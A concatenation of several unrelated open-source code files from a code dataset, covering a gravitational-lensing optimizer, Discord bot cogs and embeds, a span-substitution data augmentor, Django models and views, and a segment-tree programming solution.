full_lensmodel.lens_model._T_z_source\n\n self._observed_convention_index = observed_convention_index\n\n macromodel_lensmodel, macro_args, halo_lensmodel, halo_args = \\\n self._split_lensmodel(full_lensmodel,lensmodel_params,macro_indicies,numerical_alpha_class,\n observed_convention_index)\n self._macro_indicies = macro_indicies\n\n if 'precomputed_rays' in optimizer_kwargs:\n self._foreground = Foreground(halo_lensmodel, macromodel_lensmodel, 
self._z_macro, x_pos, y_pos,\n precompupted_rays=optimizer_kwargs['precomputed_rays'])\n else:\n self._foreground = Foreground(halo_lensmodel, macromodel_lensmodel, self._z_macro, x_pos, y_pos)\n\n self._halo_args = halo_args\n\n self._halo_lensmodel = halo_lensmodel\n self.multi_plane = False\n # this flag needs to be set as False to be compatible with the latest LensEquationSolver feature to make the\n # computation faster\n\n def set_static(self, kwargs):\n kwargs = self._full_lensmodel.set_static(kwargs)\n return kwargs\n\n def set_dynamic(self):\n self._full_lensmodel.set_dynamic()\n\n def ray_shooting(self, x, y, kwargs_lens, check_convention=True):\n\n if check_convention:\n kwargs_lens = self._set_kwargs(kwargs_lens)\n\n macromodel_args = []\n\n for ind in self._macro_indicies:\n macromodel_args.append(kwargs_lens[ind])\n\n # get the deflection angles from foreground and main lens plane subhalos (once)\n\n x, y, alphax, alphay = self._foreground.ray_shooting(self._halo_args, macromodel_args, thetax=x, thetay=y,\n force_compute=True)\n\n x_source, y_source, _, _ = self._full_lensmodel.lens_model.\\\n ray_shooting_partial(x, y, alphax, alphay, self._z_macro, self._z_source, kwargs_lens, check_convention=False)\n\n betax, betay = x_source * self._T_z_source ** -1, y_source * self._T_z_source ** -1\n\n return betax, betay\n\n def hessian(self, x, y, kwargs_lens, diff=0.00000001):\n\n kwargs_lens = self._set_kwargs(kwargs_lens)\n\n alpha_ra, alpha_dec = self._alpha(x, y, kwargs_lens, check_convention=False)\n\n alpha_ra_dx, alpha_dec_dx = self._alpha(x + diff, y, kwargs_lens, check_convention=False)\n alpha_ra_dy, alpha_dec_dy = self._alpha(x, y + diff, kwargs_lens, check_convention=False)\n\n dalpha_rara = (alpha_ra_dx - alpha_ra) * diff ** -1\n dalpha_radec = (alpha_ra_dy - alpha_ra) * diff ** -1\n dalpha_decra = (alpha_dec_dx - alpha_dec) * diff ** -1\n dalpha_decdec = (alpha_dec_dy - alpha_dec) * diff ** -1\n\n f_xx = dalpha_rara\n f_yy = dalpha_decdec\n 
f_xy = dalpha_radec\n f_yx = dalpha_decra\n\n return f_xx, f_xy, f_yx, f_yy\n\n def magnification(self,x,y,kwargs_lens):\n\n f_xx, f_xy, f_yx, f_yy = self.hessian(x,y,kwargs_lens)\n\n det_A = (1 - f_xx) * (1 - f_yy) - f_xy * f_yx\n\n return det_A**-1\n\n def _ray_shooting_fast(self, macromodel_args, offset_index=0, thetax=None, thetay=None,\n force_compute=False):\n\n # get the deflection angles from foreground and main lens plane subhalos (once)\n\n kwargs_lens = self._set_kwargs(macromodel_args + self._halo_args)\n\n x, y, alphax, alphay = self._foreground.ray_shooting(self._halo_args, macromodel_args, offset_index, thetax, thetay,\n force_compute=force_compute)\n\n x_source, y_source, _, _ = self._full_lensmodel.lens_model.ray_shooting_partial(x, y, alphax, alphay,\n self._z_macro, self._z_source, kwargs_lens, check_convention=False)\n\n betax, betay = x_source * self._T_z_source ** -1, y_source * self._T_z_source ** -1\n\n if offset_index == 0:\n self._beta_x_last, self._beta_y_last = betax, betay\n\n return betax, betay\n\n def _magnification_fast(self, macromodel_args):\n\n fxx,fxy,fyx,fyy = self._hessian_fast(macromodel_args)\n\n det_J = (1-fxx)*(1-fyy)-fyx*fxy\n\n return np.absolute(det_J**-1)\n\n def _hessian_fast(self, macromodel_args, diff=0.00000001):\n\n alpha_ra, alpha_dec = self._alpha_fast(self._x_pos, self._y_pos, macromodel_args)\n\n alpha_ra_dx, alpha_dec_dx = self._alpha_fast(self._x_pos + diff, self._y_pos, macromodel_args,\n offset_index=1)\n alpha_ra_dy, alpha_dec_dy = self._alpha_fast(self._x_pos, self._y_pos + diff, macromodel_args,\n offset_index=2)\n\n dalpha_rara = (alpha_ra_dx - alpha_ra) * diff ** -1\n dalpha_radec = (alpha_ra_dy - alpha_ra) * diff ** -1\n dalpha_decra = (alpha_dec_dx - alpha_dec) * diff ** -1\n dalpha_decdec = (alpha_dec_dy - alpha_dec) * diff ** -1\n\n f_xx = dalpha_rara\n f_yy = dalpha_decdec\n f_xy = dalpha_radec\n f_yx = dalpha_decra\n\n return f_xx, f_xy, f_yx, f_yy\n\n def _alpha_fast(self, x_pos, y_pos, 
macromodel_args, offset_index = 0):\n\n if offset_index == 0 and hasattr(self,'_beta_x_last'):\n return np.array(x_pos - self._beta_x_last), np.array(y_pos - self._beta_y_last)\n\n beta_x,beta_y = self._ray_shooting_fast(macromodel_args, offset_index=offset_index,\n thetax=x_pos, thetay=y_pos)\n\n alpha_x = np.array(x_pos - beta_x)\n alpha_y = np.array(y_pos - beta_y)\n\n return alpha_x, alpha_y\n\n def _alpha(self, x_pos, y_pos, kwargs_lens, check_convention=True):\n\n beta_x,beta_y = self.ray_shooting(x_pos, y_pos, kwargs_lens, check_convention)\n\n alpha_x = np.array(x_pos - beta_x)\n alpha_y = np.array(y_pos - beta_y)\n\n return alpha_x, alpha_y\n\n def _set_kwargs(self, kwargs_lens_full):\n\n if self._observed_convention_index is None:\n return kwargs_lens_full\n\n kwargs_physical = self._full_lensmodel.lens_model.observed2flat_convention(kwargs_lens_full)\n\n return kwargs_physical\n\n def _split_lensmodel(self, lensmodel, lensmodel_args, macro_indicies, numerical_alpha_class,\n observed_convention_inds):\n\n \"\"\"\n\n :param lensmodel: lensmodel to break up\n :param lensmodel_args: kwargs to break up\n :param z_break: the break redshift\n :param macro_indicies: the indicies of the macromodel in the lens model list\n :return: instances of LensModel for foreground, main lens plane and background halos, and the macromodel\n \"\"\"\n\n macro_names, macro_redshifts, macro_args = [], [], []\n\n halo_names, halo_redshifts, halo_args = [], [], []\n\n if observed_convention_inds is not None:\n convention_inds = []\n else:\n convention_inds = None\n\n count = 0\n\n for i in range(0, len(lensmodel.lens_model_list)):\n\n z = lensmodel.redshift_list[i]\n\n if i not in macro_indicies:\n\n halo_names.append(lensmodel.lens_model_list[i])\n halo_redshifts.append(z)\n halo_args.append(lensmodel_args[i])\n if observed_convention_inds is not None:\n if i in observed_convention_inds: convention_inds.append(count)\n count += 1\n\n else:\n\n 
macro_names.append(lensmodel.lens_model_list[i])\n macro_redshifts.append(z)\n macro_args.append(lensmodel_args[i])\n\n macromodel = LensModel(lens_model_list=macro_names, lens_redshift_list=macro_redshifts, cosmo=self._astropy_instance,\n multi_plane=True,\n z_source=self._z_source, numerical_alpha_class=numerical_alpha_class)\n\n halo_lensmodel = LensModel(lens_model_list=halo_names, lens_redshift_list=halo_redshifts,\n cosmo=self._astropy_instance, multi_plane=True, z_source=self._z_source,\n numerical_alpha_class = numerical_alpha_class, observed_convention_index=convention_inds)\n\n return macromodel, macro_args, halo_lensmodel, halo_args\n\n\nclass Foreground(object):\n\n def __init__(self, foreground_lensmodel, macromodel_lensmodel, z_to_vary, x_pos, y_pos, precompupted_rays = None):\n\n self._halos_lensmodel = foreground_lensmodel\n self._macromodel_lensmodel = macromodel_lensmodel\n self._z_to_vary = z_to_vary\n self._x_pos, self._y_pos = x_pos, y_pos\n\n dis = self._halos_lensmodel.lens_model._multi_plane_base._cosmo_bkg.T_xy\n if precompupted_rays is None:\n self._rays = [None] * 3\n else:\n self._rays = precompupted_rays\n\n self._Txy_main = dis(0, z_to_vary)\n z_source = self._halos_lensmodel.lens_model._z_source\n self._factor = dis(0, z_source) / dis(z_to_vary, z_source)\n\n def ray_shooting(self, args, macro_args, offset_index=None, thetax=None, thetay=None, force_compute=True):\n\n x, y, alphax, alphay = self._ray_shooting_cache(args, offset_index, thetax, thetay, force_compute)\n\n x, y, alphax, alphay = self._macromodel_lensmodel.lens_model.ray_shooting_partial(x, y, alphax, alphay,\n self._z_to_vary, self._z_to_vary, macro_args, include_z_start=True)\n\n return x, y, alphax, alphay\n\n def _ray_shooting_cache(self,args,offset_index=None,thetax=None,thetay=None,force_compute=True):\n\n if force_compute:\n\n x0, y0 = np.zeros_like(thetax), np.zeros_like(thetay)\n x, y, alphax, alphay = self._halos_lensmodel.lens_model.ray_shooting_partial(x0, y0, 
thetax, thetay,\n z_start=0,\n z_stop=self._z_to_vary,\n kwargs_lens=args)\n return x, y, alphax, alphay\n\n else:\n\n if self._rays[offset_index] is None:\n x0, y0 = np.zeros_like(self._x_pos), np.zeros_like(self._y_pos)\n\n if offset_index == 0:\n thetax, thetay = self._x_pos, self._y_pos\n\n x, y, alphax, alphay = self._halos_lensmodel.lens_model.ray_shooting_partial(x0, y0, thetax,\n thetay, z_start=0,\n z_stop=self._z_to_vary,\n kwargs_lens=args)\n\n self._rays[offset_index] = {'x': x, 'y': y, 'alphax': alphax, 'alphay': alphay}\n\n return self._rays[offset_index]['x'], self._rays[offset_index]['y'],\\\n self._rays[offset_index]['alphax'], self._rays[offset_index]['alphay']\n","repo_name":"franyancr/lenstronomy","sub_path":"lenstronomy/LensModel/Optimizer/multi_plane_optimizer.py","file_name":"multi_plane_optimizer.py","file_ext":"py","file_size_in_byte":12235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"28200704899","text":"import platform\n\nfrom nextcord import Embed, __version__ as dpy_v\nfrom nextcord.ext.commands import (\n Cog, command, cooldown,\n BucketType\n)\n\nfrom core.bot import MainBot\nfrom utils.checks import is_admin\nfrom utils import logging\n\nlogger = logging.get_logger(__name__)\n\n\nclass Admin(Cog):\n def __init__(self, bot: MainBot):\n self.bot = bot\n\n async def cog_check(self, ctx) -> bool:\n return await is_admin(ctx)\n\n @command(\n name=\"stats\", description=\"A useful command that displays bot statistics.\"\n )\n @cooldown(1, 3, BucketType.user)\n async def stats(self, ctx):\n \"\"\"\n A useful command that displays bot statistics.\n \"\"\"\n r = await self.bot.session.get(\n 'https://source.unsplash.com/random/?server,computer,internet')\n embed = Embed(\n title=f'{self.bot.user.name} Stats',\n description='\\uFEFF',\n colour=ctx.author.color,\n timestamp=ctx.message.created_at\n )\n\n embed.add_field(name='Bot Version:', value=self.bot.version)\n 
embed.add_field(name='Python Version:', value=platform.python_version())\n embed.add_field(name='nextcord.Py Version', value=dpy_v)\n embed.add_field(name='Total Guilds:', value=str(len(self.bot.guilds)))\n embed.add_field(name='Total Users:', value=str(len(set(self.bot.get_all_members()))))\n embed.add_field(name='Bot Developers:', value=f\"{self.bot.owner}\")\n embed.set_image(url=r.url)\n embed.set_author(name=ctx.author.name, icon_url=ctx.author.display_avatar.url)\n\n await ctx.reply(embed=embed)\n\n\ndef setup(bot):\n bot.add_cog(Admin(bot))\n","repo_name":"drlove2002/Basic-Discord-Private-Bot-Template","sub_path":"cogs/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"36885523227","text":"\n#import ac\n\nclass MovingAveragePlotter:\n def __init__(self, averagedOverNumPoints=5):\n self.averagedOverNumPoints = averagedOverNumPoints\n\n def averagePoint(self, averagedPoints, totals, counter):\n averagedPoints.append({\"x\": totals['x'] / counter, \"y\": totals['y'] / counter,\n \"z\": totals['z'] / counter})\n\n def plotMovingAverage(self, dataPoints):\n totals = {\"x\": 0, \"y\": 0, \"z\": 0}\n counter = 0\n previousPointIndex = 0\n\n numPoints = len(dataPoints)\n\n averagedPoints = []\n if(numPoints < self.averagedOverNumPoints):\n return averagedPoints\n\n for point in dataPoints:\n #ac.log(\"len={0}, previous={1}\".format(numPoints, previousPointIndex))\n if (counter >= self.averagedOverNumPoints):\n self.averagePoint(averagedPoints, totals, counter)\n if(previousPointIndexstruc_tuple (span_A and span_B are the same ALA they have the same struc)\n --value: a single int\n @exchange: dict\n --key1: encode(span)->encode(struc_tuple)\n --value: a singe int: also the encode of a type of spans\n\n @enc2type: dict, for `cogs`-type task only;\n --key1: enc(span)\n --value: type = 'span', 'lex', or 'tree'.\n\n [task: scan]\n \n 
@span_pool: list,[span_str1, span_str2,...]\n \n @inp_candidates: dict\n --key1: inp_idx\n\n @span_encodes: dict\n --key1: span's string(span_A and span_B are different)\n --value: a single int\n @exchange: dict\n --key1: encode(span)\n --value: a single int: also the encode of a type of spans\n '''\n self.span_pool = span_pool\n self.inp_cands = inp_candidates\n self.span_enc_dict = span_encodes\n self.exchanges = exchanges\n self.vocab = vocab\n self.enc2type = enc2type\n\n def get_span_encode(self, span, mode = 0):\n '''\n mode = 0: `scan`-style task, encode span to an int\n mode = 1: `cogs`-style task, encode struc to an int\n '''\n return self.span_enc_dict[span]\n\n def get_inp_candidates(self, inps, inp_ids, mode=0):\n '''\n inp.type = list, inp.'shape' = [bs, seq_len]\n mode = 0: each unique span as a singe candidate;\n mode = 1: span with the same tag would be treated as a single candidate;\n '''\n batch_cands_encode = list()\n batch_mask_indicat = list()\n inps_mask = list()\n inps_mask_cnt = list()\n inps_spans = list()\n\n if mode == 0:\n bs = len(inp_ids)\n for i in range(bs):\n inp = inps[i]\n\n inp_spans = list(self.inp_cands[inp_ids[i]])\n inps_spans.append(inp_spans)\n\n datum_cands_encode = list()\n\n for inp_span in inp_spans:\n inp_span_enc = self.get_span_encode(inp_span, mode = 0)\n # here we assume that inp_span_enc is a `int`-type data\n datum_cands_encode.append(inp_span_enc)\n batch_mask_indicat.append(len(datum_cands_encode))\n \n\n while len(datum_cands_encode) < FLAGS.fix_num_span:\n datum_cands_encode.append(PAD)\n\n batch_cands_encode.append(datum_cands_encode)\n '''\n e.g., batch_cands_encode is like : \n [\n [e11, e12, e13, ..., e17, PAD, PAD, PAD],\n [e21, e22, e23, ..., e26, PAD, PAD, PAD, PAD],\n ...,\n [e{bs,1}, e{bs,2},..., e{bs,9}, PAD]\n ]\n '''\n inp_mask,inp_mask_cnt = self.get_inp_masks(inp, inp_spans, mode=0)\n inps_mask_cnt.append(inp_mask_cnt)\n inps_mask.append(inp_mask)\n\n\n\n '''\n second: leverage function: 
`get_inp_masks` to get the mask vector\n indicating which tokens need to be subsed out for each inp.\n '''\n \n return batch_cands_encode, batch_mask_indicat, None, inps_mask, inps_spans, inps_mask_cnt\n \n elif mode == 1:\n '''\n span with the same tag would be treated as a single candidate;\n to do\n '''\n batch_reminder = list()\n bs = len(inp_ids)\n for i in range(bs):\n inp = inps[i]\n inp_spans = self.inp_candidates[inp_ids[i]]\n '''\n @inp_candidates: dict\n --key1: inp_idx\n --key2: span_type\n --key3: struc_type\n '''\n rand_val = random.random()\n\n while 1:\n if rand_val < FLAGS.p_tree2tree:\n if 'tree' not in inp_spans:\n continue\n inp_strucs = inp_spans['tree']\n reminder = 'tree2tree'\n break\n\n elif rand_val < FLAGS.p_lex2lex + FLAGS.p_tree2tree:\n if 'lex' not in inp_spans:\n continue\n inp_strucs = inp_spans['lex']\n reminder = 'lex2lex'\n break\n\n elif rand_val < FLAGS.p_span2span + FLAGS.p_lex2lex + FLAGS.p_tree2tree:\n if 'span' not in inp_spans:\n continue\n inp_strucs = inp_spans['span']\n reminder = 'span2span'\n break\n\n else:\n if 'lex' not in inp_spans:\n continue\n inp_strucs = inp_spans['lex']\n reminder = 'lex2span'\n break\n\n batch_reminder.append(reminder)\n # this reminder is to prompt which kind of struc need to be subsed in\n\n datum_cands_encode = list()\n \n\n sampled_inp_spans = self.sample_repre(inp_strucs, 1)\n inps_spans.append(sampled_inp_spans)\n\n # `sampled_inp_spans` here should be like `inp_spans` in the scan-style task\n inp_mask = self.get_inp_masks(inp, sampled_inp_spans, mode=1)\n inps_mask.append(inp_mask)\n\n for inp_struc in inp_strucs.keys():\n inp_struc_enc = self.get_span_encode(inp_struc, mode = 0)\n # here we assume that inp_span_enc is a `int`-type data\n datum_cands_encode.append(inp_struc_enc)\n\n batch_mask_indicat.append(FLAGS.fix_num_span - len(inp_struc_enc))\n \n\n while len(datum_cands_encode) < FLAGS.fix_num_span:\n datum_cands_encode.append(PAD)\n 
batch_cands_encode.append(datum_cands_encode)\n \n '''\n to do\n first: leverage function: `sample_repre` to sample the represents\n from each cluster;\n second: leverage function: `get_inp_masks` to get the mask vector\n indicating which tokens need to be subsed out for each inp.\n '''\n\n return batch_cands_encode, batch_mask_indicat, batch_reminder, inps_mask, inps_spans, None\n pass\n \n def sample_repre(self, cands=None, mode=1):\n '''\n only be used when dealing with `cogs`-style dataset.\n mode = 0: sample the representants from span_bool;\n mode = 1: sample the representants from inp_cands;\n cands are supposed to be like \n cands: dict\n ---key1: struc_type\n ---value: concrete span(str...)\n return:\n list: representatives for each type of struc\n '''\n pass\n \n def get_inp_masks(self, inp, span_cands, mode =0):\n '''\n get the mask vector indicating which ids of the inp are supposed\n to be subsed out\n e.g., \n `inp`: jump opposite right twice and look left thrice \n `span`: \n {\n jump opposite right, look left thrice, look, jump, right, left\n }\n `masks`:(all of the element are torch.tensors), shape[0] = fix_len_span;\n shape[1] = seq_len\n { \n [1,0,0,0,1,1,1,1,1,1],\n [1,1,1,1,1,1,0,0,0,1],\n [1,1,1,1,1,1,0,1,1,1],\n [1,0,1,1,1,1,1,1,1,1],\n [1,1,1,0,1,1,1,1,1,1],\n [1,1,1,1,1,1,1,0,1,1],\n PAD,\n PAD,\n ...,\n PAD\n }\n\n P.S.:\n mode = 0 : `scan`-style\n mode = 1 : `cogs`-style\n '''\n if mode == 0:\n inp_mask = list()\n inp_mask_cnt = list()\n # len(inp) = seq_len, \n # [, 3, 21, ..., 17, , , ]\n inp_ = list()\n for tok_enc in inp:\n inp_.append(self.vocab.decode_tok(tok_enc))\n inp_str = ' '.join(inp_)\n for cand in span_cands:\n cand_cnt = inp_str.count(cand)\n assert cand_cnt in [1,2]\n inp_mask_cnt.append(cand_cnt)\n\n tok_num = cand.count(' ')+1\n mask_rep = ''\n for i in range(tok_num-1):\n mask_rep = mask_rep+' '\n inp_str_r = inp_str.replace(cand, mask_rep)\n inp_li = inp_str_r.split(' ')\n mask = list()\n for i in range(len(inp_li)):\n 
if inp_li[i] == '':\n mask.append(0)\n else:\n mask.append(1)\n inp_mask.append(mask)\n \n pad = list()\n for i in range(len(inp)):\n pad.append(1)\n\n while len(inp_mask_cnt) < FLAGS.fix_num_span:\n inp_mask.append(pad)\n inp_mask_cnt.append(0)\n \n return inp_mask, inp_mask_cnt\n \n def get_cands_from_pool(self, out_spans, reminders=None, mode = 0):\n '''\n out_spans: list, len(out_spans) = bs\n e.g., out_spans = [3, 9, 19, 2, 28, 6, 4, ...]\n where `3(28)` may represent span_encodes['jump around right']\n mode = 0:for `scan`-type task\n mode = 1:for `cogs`-type task \n return: \n [\n 1:[span_encodes[key1],...,span_encodes[last_key]],\n 2:[],\n ...,\n bs:[]\n ]\n ***: we need to additionally record which value we would set to -inf;\n ***: for `cogs`-type task, we additionally need to record the representives;\n reminder: (only for `cogs`-type task) = ['span2span','lex2span',...],len=bs\n '''\n bs = len(out_spans)\n pool_cands=list()\n exchangeables = list()\n all_spans = list()\n if mode == 0:\n for span in self.span_pool:\n # span_pool = list[cand_str1,...]\n all_spans.append(self.get_span_encode(span, 0))\n # [encode(cand_str1),...]\n #sampled_repres = None\n\n elif mode == 1:\n strucs = dict()\n for key1 in self.span_pool:\n # first-layer key = span_type\n for key2 in self.span_pool[key1]:\n # second-layer key = (inp_node_type, out_node_type)\n for key3 in self.span_pool[key1][key2].keys():\n # third-layer key = struc_type\n all_spans.append(self.get_span_encode(key3, 1))\n assert key3 not in strucs\n # key3 are not supposed to already exist in strucs\n strucs[key3] = self.span_pool[key1][key2][key3]\n # a potential bug: is there arranged by order which I set?\n #sampled_repres = self.sample_repre(strucs, 0)\n #note, for each datum in a batch, we should resample repres for it.\n\n sampled_repres = list()\n # it is supposed to contain bs list, and each one of them are supposed\n # to be a repre_set\n for i in range(bs):\n out_span = out_spans[i]\n exchange = 
self.exchanges[out_span]\n # e.g. exchange = [3, 5, 8, 14, 41, 124, ...]\n \n if mode == 0:\n temp_exch = list()\n for j in range(len(all_spans)):\n if all_spans[j] in exchange:\n temp_exch.append(j)\n exchangeables.append(temp_exch)\n # only those appear in the exchangeable ids won't be set to -inf\n pool_cands.append(all_spans)\n\n elif mode == 1:\n reminder = reminders[i] # e.g.,'lex2span'\n out_span_type = self.enc2type[out_span] # e.g.,'lex'\n temp_exch = list()\n for j in range(len(all_spans)):\n if all_spans[j] in exchange:\n in_span_type = self.enc2type[all_spans[j]]\n if out_span_type+'2'+in_span_type == reminder:\n temp_exch.append(j)\n exchangeables.append(temp_exch)\n pool_cands.append(all_spans)\n sampled_repre = self.sample_repre(strucs, 0)\n sampled_repres.append(sampled_repre)\n\n return pool_cands, exchangeables, sampled_repres\n\n\n\ndef recombine_parse_scan():\n pass\n\ndef recombine_parse_cogs():\n pass","repo_name":"Joeylee-rio/Compgen_l2s2","sub_path":"learning-to-spansub/model/augmentor_utils.py","file_name":"augmentor_utils.py","file_ext":"py","file_size_in_byte":14090,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"69803200455","text":"from sellmo import modules\nfrom sellmo.contrib.attribute.types import AttributeType\n\nimport re\n\nfrom django.db import models\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass AttributeKeyField(models.SlugField):\n\n def validate(self, value, instance):\n super(AttributeKeyField, self).validate(value, instance)\n key_regex = r'[a-z][a-z0-9_]*'\n if not re.match(key_regex, value):\n raise ValidationError(_(\"Must be all lower case, \"\n \"start with a letter, and contain \"\n \"only letters, numbers, or underscores.\"))\n if value in modules.product.reserved_url_params:\n raise ValidationError(_(\"Conflicts with url parameter\"))\n\n @staticmethod\n def 
create_key_from_name(name):\n\n name = name.strip().lower()\n\n # Change spaces to underscores\n name = '_'.join(name.split())\n\n # Remove non alphanumeric characters\n return re.sub('[^\\w]', '', name)\n\n\nclass AttributeTypeField(models.CharField):\n\n def validate(self, value, instance):\n super(AttributeTypeField, self).validate(value, instance)\n old = None\n\n if instance.pk:\n old = modules.attribute.Attribute.objects.get(pk=instance.pk)\n\n if not old or value == old.type:\n return\n\n if instance.values.count() > 0:\n raise ValidationError(\n _(\"Cannot change attribute type \"\n \"of an attribute that is already in use.\"))","repo_name":"leotop/django-sellmo","sub_path":"sellmo/contrib/attribute/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"21636200963","text":"import discord\n\nfrom config import *\n\n\nasync def model_info_embed(service: str, model: dict) -> discord.Embed:\n embed = discord.Embed(\n title=f\"Model data for {model['id']}\",\n description=f\"This includes the basic information about the model\",\n color=discord.Colour.blurple(),\n )\n embed.set_author(name=bot_name, icon_url=avatar_url)\n embed.set_thumbnail(url=f\"{icon_base_url}/{service}/{model['id']}\")\n embed.set_image(url=f\"{banner_base_url}/{service}/{model['id']}\")\n\n embed.add_field(name=\"First appeared\", value=model[\"indexed\"], inline=True)\n embed.add_field(name=\"Last update\", value=model[\"updated\"], inline=True)\n\n return embed\n\n\nasync def loading_more_embed() -> discord.Embed:\n embed = discord.Embed(\n title=\"Loading more pictures...\",\n description=\"Please wait while we load more pictures for you\",\n color=discord.Colour.blurple(),\n )\n embed.set_author(name=bot_name, icon_url=avatar_url)\n\n return embed\n\n\nasync def no_data_available_embed(name: str) -> discord.Embed:\n embed = discord.Embed(\n title=\"No 
data available\",\n description=f\"There is no data available for {name}\",\n color=discord.Colour.blurple(),\n )\n embed.set_author(name=bot_name, icon_url=avatar_url)\n\n return embed\n\n\nasync def unloading_results_embed() -> discord.Embed:\n embed = discord.Embed(\n title=\"Unloading results\",\n description=\"We are unloading your request to save resources. If you want to continue, please use the command again.\",\n color=discord.Colour.blurple(),\n )\n embed.set_author(name=bot_name, icon_url=avatar_url)\n\n return embed\n\n\nasync def no_more_pictures_embed() -> discord.Embed:\n embed = discord.Embed(\n title=\"No more pictures\",\n description=\"There are no more pictures available for this model\",\n color=discord.Colour.blurple(),\n )\n embed.set_author(name=bot_name, icon_url=avatar_url)\n\n return embed\n\n\nasync def generated_image_embed(image_data) -> discord.Embed:\n embed = discord.Embed(\n title=\"AI Image Generation\",\n description=\"Those are the parameters used to generate the image\",\n color=discord.Colour.blurple(),\n )\n embed.set_author(name=bot_name, icon_url=avatar_url)\n embed.add_field(name=\"Prompt\", value=image_data[\"params\"][\"prompt\"])\n embed.add_field(name=\"Negative Prompt\", value=image_data[\"params\"][\"prompt\"])\n embed.add_field(name=\"Seed\", value=image_data[\"params\"][\"seed\"], inline=True)\n embed.add_field(\n name=\"CFG scale\", value=image_data[\"params\"][\"cfg_scale\"], inline=True\n )\n embed.add_field(\n name=\"Generation steps\", value=image_data[\"params\"][\"steps\"], inline=True\n )\n embed.add_field(\n name=\"Sampler\", value=image_data[\"params\"][\"sampler_name\"], inline=True\n )\n embed.add_field(\n name=\"Model\",\n value=image_data[\"params\"][\"options\"][\"sd_model_checkpoint\"],\n inline=True,\n )\n\n return 
embed\n","repo_name":"alexandreteles/coomer_bot","sub_path":"views/embeds.py","file_name":"embeds.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36010342309","text":"import sys\ninput = sys.stdin.readline\n\ndef init(s, e, i):\n if s == e: seg[i] = arr[s]\n else:\n m, ch = (s + e) >> 1, i << 1\n seg[i] = init(s, m, ch) + init(m + 1, e, ch + 1)\n return seg[i]\n\ndef summ(s, e, l, r, i):\n if lz[i]: propagation(s, e, i)\n if r < s or l > e: return 0\n if l <= s and e <= r: return seg[i]\n m, ch = (s + e) >> 1, i << 1\n return summ(s, m, l, r, ch) + summ(m + 1, e, l, r, ch + 1)\n\ndef update(s, e, l, r, i, d):\n if lz[i]: propagation(s, e, i)\n if e < l or r < s: return\n if s == e: seg[i] += d\n elif l <= s and e <= r:\n ch = i << 1\n seg[i] += (e - s + 1) * d\n lz[ch] += d\n lz[ch + 1] += d\n else:\n m, ch = (s + e) >> 1, i << 1\n update(s, m, l, r, ch, d)\n update(m + 1, e, l, r, ch + 1, d)\n seg[i] = seg[ch] + seg[ch + 1]\n\ndef propagation(s, e, i):\n ch = i << 1\n seg[i] += (e - s + 1) * lz[i]\n if s != e:\n lz[ch] += lz[i]\n lz[ch + 1] += lz[i]\n lz[i] = 0\n\n\nN, M = map(int, input().split())\narea, arr = {}, [0]\n\nx, y, d = map(int, input().split())\nif x <= y:\n for i in range(x, y + 1): area[i] = 1\n arr.append(d)\nelse:\n for i in range(y, N + 1): area[i] = 1\n for i in range(1, x + 1): area[i] = 1\n arr.append(d)\n\nfor m in range(2, M + 1):\n x, y, d = map(int, input().split())\n for i in range(x, y + 1): area[i] = m\n arr.append(d)\n\nseg = [0] * (1 << (M.bit_length() + 1))\nlz = seg[:]\ninit(1, M, 1)\n\nwhile 1:\n cmd = tuple(map(int, input().split()))\n if cmd[0] == 0: break\n if cmd[0] == 1:\n if area[cmd[1]] <= area[cmd[2]]:\n sys.stdout.write(str(summ(1, M, area[cmd[1]], area[cmd[2]], 1)) + '\\n')\n else:\n sys.stdout.write(str(summ(1, M, area[cmd[1]], M, 1) + summ(1, M, 1, area[cmd[2]], 1)) + '\\n')\n else:\n if area[cmd[1]] <= 
area[cmd[2]]:\n update(1, M, area[cmd[1]], area[cmd[2]], 1, cmd[3])\n else:\n update(1, M, area[cmd[1]], M, 1, cmd[3])\n update(1, M, 1, area[cmd[2]], 1, cmd[3])\n\n# 비재귀 세그트리 구현해보기\n","repo_name":"abcworld123/practice","sub_path":"baekjoon/Platinum/[P4] 겨울나기.py","file_name":"[P4] 겨울나기.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15483124649","text":"from multiprocessing import context\nfrom django.shortcuts import render, HttpResponse,redirect\nfrom .models import *\nfrom django.contrib import messages\n\ndef root(request):\n return redirect(\"/shows\")\n\ndef index(request):\n context = {\n 'movies': Movie.objects.all(),\n }\n return render(request ,\"index.html\", context)\n\ndef create_new(request):\n return render(request, \"create.html\")\n\ndef add_new(request):\n errors = Movie.objects.basic_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('./new')\n else:\n newMovie = Movie.objects.create(\n title=request.POST['title'],\n network=request.POST['network'],\n release_date=request.POST['rel_date'],\n desc=request.POST['desc'],\n )\n newMovie.save()\n return redirect(\"Display\", id = newMovie.id)\n\ndef dis_show(request, id):\n context = {\n 'movie': Movie.objects.get(id = id),\n }\n return render(request, 'show.html', context)\n\ndef edit_show(request,id):\n context = {\n 'movie': Movie.objects.get(id=id),\n }\n return render(request, \"edit.html\", context)\n\ndef update_show(request, id):\n errors = Movie.objects.basic_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('./edit')\n else:\n update_movie = Movie.objects.get(id=id)\n update_movie.title= request.POST['title']\n update_movie.network= request.POST['network']\n update_movie.release_date= request.POST['rel_date']\n 
